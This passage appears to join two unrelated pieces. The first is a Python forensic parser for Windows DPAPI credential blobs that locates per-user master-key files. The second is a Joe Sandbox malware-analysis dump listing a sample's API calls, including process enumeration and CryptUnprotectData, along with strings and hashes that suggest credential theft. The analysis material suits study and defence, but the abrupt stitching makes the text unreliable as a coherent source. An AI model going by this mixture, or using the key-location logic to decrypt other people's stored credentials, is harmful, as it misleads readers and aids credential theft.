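def _counted(buf: bytes, off: int) -> Tuple[bytes, int]:
    """A DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("truncated DPAPI blob")
    return buf[off:off + n], off + n


def _guid(buf: bytes, off: int) -> Tuple[uuid.UUID, int]:
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def parse_dpapi_blob(blob: bytes) -> Dict[str, object]:
    """Walk the CryptProtectData blob header and return the fields an
    investigator needs to locate the right master key and check the
    algorithms in use. Raises ValueError for anything that is not a DPAPI blob."""
    off = 0
    version, off = _u32(blob, off)
    provider, off = _guid(blob, off)
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError("provider GUID mismatch: not a DPAPI blob")
    mk_version, off = _u32(blob, off)
    master_key, off = _guid(blob, off)
    flags, off = _u32(blob, off)
    description, off = _counted(blob, off)       # UTF-16LE, NUL terminated
    crypt_algo, off = _u32(blob, off)
    crypt_bits, off = _u32(blob, off)
    salt, off = _counted(blob, off)
    _strong_hmac_key, off = _counted(blob, off)  # normally empty
    hash_algo, off = _u32(blob, off)
    hash_bits, off = _u32(blob, off)
    _hmac2_key, off = _counted(blob, off)
    data, off = _counted(blob, off)
    sign, off = _counted(blob, off)
    return {
        "version": version,
        "master_key_guid": str(master_key),
        "master_key_version": mk_version,
        "flags": flags,
        "description": description.decode("utf-16-le").rstrip("\x00"),
        "crypt_algo": ALG_NAMES.get(crypt_algo, hex(crypt_algo)),
        "crypt_bits": crypt_bits,
        "hash_algo": ALG_NAMES.get(hash_algo, hex(hash_algo)),
        "hash_bits": hash_bits,
        "salt_len": len(salt),
        "data_len": len(data),
        "sign_len": len(sign),
        "trailing_bytes": len(blob) - off,
    }


def master_key_path(user_sid: str, master_key_guid: str) -> str:
    """Where the per-user master key file for this blob lives on the victim host."""
    return rf"%APPDATA%\Microsoft\Protect\{user_sid}\{master_key_guid}"


def build_sample_blob(master_key_guid: str, description: str, ciphertext: bytes) -> bytes:
    """Constructed test blob with the real header layout (AES-256 / SHA-512,
    the defaults on current Windows); the ciphertext and signature are dummies."""
    desc = (description + "\x00").encode("utf-16-le")
    return b"".join([
        struct.pack("<I", 1), DPAPI_PROVIDER_GUID.bytes_le,
        struct.pack("<I", 1), uuid.UUID(master_key_guid).bytes_le,
        struct.pack("<I", 0),
        struct.pack("<I", len(desc)), desc,
        struct.pack("<II", 0x6610, 256),
        struct.pack("<I", 32), bytes(32),    # salt
        struct.pack("<I", 0),                # strong HMAC key (absent)
        struct.pack("<II", 0x800E, 512),
        struct.pack("<I", 32), bytes(32),    # HMAC2 key
        struct.pack("<I", len(ciphertext)), ciphertext,
        struct.pack("<I", 64), bytes(64),    # signature
    ])


if __name__ == "__main__":
    blob = build_sample_blob("12345678-1234-5678-1234-567812345678", "Local Credential Data", bytes(48))
    info = parse_dpapi_blob(blob)
    print(info)
    print(master_key_path("S-1-5-21-1-2-3-1001", info["master_key_guid"]))
```

When a blob taken from the dump parses cleanly but the master-key GUID is absent from the user's Protect directory, the blob was protected under a different account or with the machine scope, which changes where to look for the key material; the parser gives you that answer before any decryption attempt.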
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C97AE
                                        • Process32First.KERNEL32(007D0ACE,00000128), ref: 007C97C2
                                        • Process32Next.KERNEL32(007D0ACE,00000128), ref: 007C97D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 007C97EC
                                        • CloseHandle.KERNEL32(007D0ACE), ref: 007C980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: d4aa7e86469d7f2365b4b80ea981c8b7fd6b46ec68126011792a420f25128f49
                                        • Instruction ID: 4507386d677cbe22b9d642673b04b52e1d0880fb7417feea27e70884f38f5d83
                                        • Opcode Fuzzy Hash: d4aa7e86469d7f2365b4b80ea981c8b7fd6b46ec68126011792a420f25128f49
                                        • Instruction Fuzzy Hash: A201E975A14208EBDB60DFA4CD48BDDB7F8BB08700F10468CE609A7240EB34DA40CB50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: dd51ab6622372f902824f5f0cf0224be282e510cc402e75f7cf66822dae7d828
                                        • Instruction ID: db2b7a4091c26fafe2be498a061613046aa700dde717500a777ecc86ec7d6985
                                        • Opcode Fuzzy Hash: dd51ab6622372f902824f5f0cf0224be282e510cc402e75f7cf66822dae7d828
                                        • Instruction Fuzzy Hash: 0B63207241EBD41FCB27CB3087B65517F76BA1362031949CFC4C18B6B3C698AA1AE356
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,007B51D4,40000001,00000000,00000000,?,007B51D4), ref: 007C9050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 8359a186a367214baa1010437fe7bf024315b18e1136865eb696211a89be52a4
                                        • Instruction ID: b0926eb285a33b9e54fc382fd4f9552ebc8dd6b989f39618713ea464df9842b6
                                        • Opcode Fuzzy Hash: 8359a186a367214baa1010437fe7bf024315b18e1136865eb696211a89be52a4
                                        • Instruction Fuzzy Hash: B4110A74204205FFDF40CF94D889FAA33A9AF89310F20844CFE198B250D779E981CBA4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007D0DE8,00000000,?), ref: 007C7B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,007D0DE8,00000000,?), ref: 007C7B54
                                        • wsprintfA.USER32 ref: 007C7B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: a1f153bfb70486d24d537aefa306ffc80a578508220f13f67e9cec901c121749
                                        • Instruction ID: 46ff52063f17aa141aa2ba1ac4af38734ce0e95c59ab91244b9be3698e6e08e4
                                        • Opcode Fuzzy Hash: a1f153bfb70486d24d537aefa306ffc80a578508220f13f67e9cec901c121749
                                        • Instruction Fuzzy Hash: 231118B2908118AACB14DBC9DD45FBEB7B8EB48B11F10411AF605A2280E6399940C7B0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0165EB08,00000000,?,007D0DF8,00000000,?,00000000,00000000), ref: 007C7BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0165EB08,00000000,?,007D0DF8,00000000,?,00000000,00000000,?), ref: 007C7C0D
                                        • wsprintfA.USER32 ref: 007C7C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: faf8670cfbdb5e1c9ff5c9e4253150313417783d966a0dc4b2cd82f7ba9a6998
                                        • Instruction ID: ffb2b852f8ce9c6818b1d072c0b3c180a7820817d31cafe6398a3ef1b9df9cb2
                                        • Opcode Fuzzy Hash: faf8670cfbdb5e1c9ff5c9e4253150313417783d966a0dc4b2cd82f7ba9a6998
                                        • Instruction Fuzzy Hash: 4C11A1B1909219EBEB24CB54DC45FA9B778FB44711F1043D9F619A72D0DB785A40CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?sg$f&-k$w[.^
                                        • API String ID: 0-1904539943
                                        • Opcode ID: 4ca233f7a1950f6f03f42cf89e89b2fcf05beb14a8ef85e0ac09610b75c53004
                                        • Instruction ID: 9fd89058f8a0f998b6c861f751edd632c8c49f21fc961cd504c5f246ec356417
                                        • Opcode Fuzzy Hash: 4ca233f7a1950f6f03f42cf89e89b2fcf05beb14a8ef85e0ac09610b75c53004
                                        • Instruction Fuzzy Hash: 32B25AF3A0C214AFE3046E2DEC8567BBBE9EF94720F1A463DEAC4C7744E53558018696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $Y/$+{_/$rQj~
                                        • API String ID: 0-3974896256
                                        • Opcode ID: bec80b5c7ffe422598402fdebf382be2a98a345e033c59946ac41829e524699f
                                        • Instruction ID: 95507720a6493b15fd45886425f00fac0760e82979451003dd1508973a336678
                                        • Opcode Fuzzy Hash: bec80b5c7ffe422598402fdebf382be2a98a345e033c59946ac41829e524699f
                                        • Instruction Fuzzy Hash: B6A2F6F360C2049FE3046E29EC8567AFBE9EF94320F1A493DEAC4C7744EA7558058697
                                        APIs
                                        • CoCreateInstance.COMBASE(007CE120,00000000,00000001,007CE110,00000000), ref: 007C39A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007C3A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 7aaa5b0af0d2f5759aaa6c9f5e84f3a3a0ef2a891fcfb210bc9867b04c710b42
                                        • Instruction ID: 330b0892eab50dc80bdca003d2c0dac9321a4c0ad1f19084bb122ffa808d4760
                                        • Opcode Fuzzy Hash: 7aaa5b0af0d2f5759aaa6c9f5e84f3a3a0ef2a891fcfb210bc9867b04c710b42
                                        • Instruction Fuzzy Hash: 6C41E970A40A189FDB24DB54CC95F9BB7B5BB48702F5082D8E618E72D0D771AE85CF50
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007BA2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 007BA2F3
                                        • LocalFree.KERNEL32(?), ref: 007BA323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 727d646bb8f6485df970165c831b4b7f332d2d589a5a7d56ca0ccd77d55332b1
                                        • Instruction ID: b47309e1ce8bf0067f2aa14d387b45de781309b32b844ddbe7f4672f5857139b
                                        • Opcode Fuzzy Hash: 727d646bb8f6485df970165c831b4b7f332d2d589a5a7d56ca0ccd77d55332b1
                                        • Instruction Fuzzy Hash: 0C11B7B8A00209EFCB04DFA4D989AAEB7B5FF89300F104559ED15A7350D770AE55CF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &o_${yw
                                        • API String ID: 0-1902345325
                                        • Opcode ID: 5825c811a45e57d9fad567597f2d11f0e26e37ce73547fd2686aa1bad2dbbca4
                                        • Instruction ID: e12c2ef46776eaf2a599912fb2374c272f37f4f941617fd3df24180fca2f0176
                                        • Opcode Fuzzy Hash: 5825c811a45e57d9fad567597f2d11f0e26e37ce73547fd2686aa1bad2dbbca4
                                        • Instruction Fuzzy Hash: FAB215F360C2049FE3046E2DEC8567ABBE9EF94320F1A493DE6C4C7744EA3598458697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: FTm$rw9
                                        • API String ID: 0-1961150735
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: [pzW
                                        • API String ID: 0-1231448772
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2G~
                                        • API String ID: 0-3026970577
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: y5{'
                                        • API String ID: 0-2081554983
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: fff284297895d5b18f63d5850c4b57f1d66ac3f8440b4199711db5414306fa39
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 5482EFB5A00F448FD365CF29C880B92BBF1BF5A300F548A2ED9EA8B751DB35A545CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 5ceb0fdf2c1f504077cb4afac8350613ccdd102ef3e1817d1520f91e244e78ce
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 7F42B3706047498FC729CF19C090775FBE2BF99314F288A6EC7868B792D639E885CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: bcc1512cc2bce2f94f4a1b04582a741e5aa131e7cd98ff75ffb78cbe98f98a16
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: EF02E671E0022A8FDB15CE29D8906AFB7A2FFD9354F16831AE815F7241D770AD8287D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 1d2cd25f58df53781bf09f8141d4b3abf5630c5c3e393358b98d905a9991b99f
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: 0E02ED71A093098FDB55CF29C881269BBE1FFA5310F14C72DECD9DB3A2D771A8858A41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
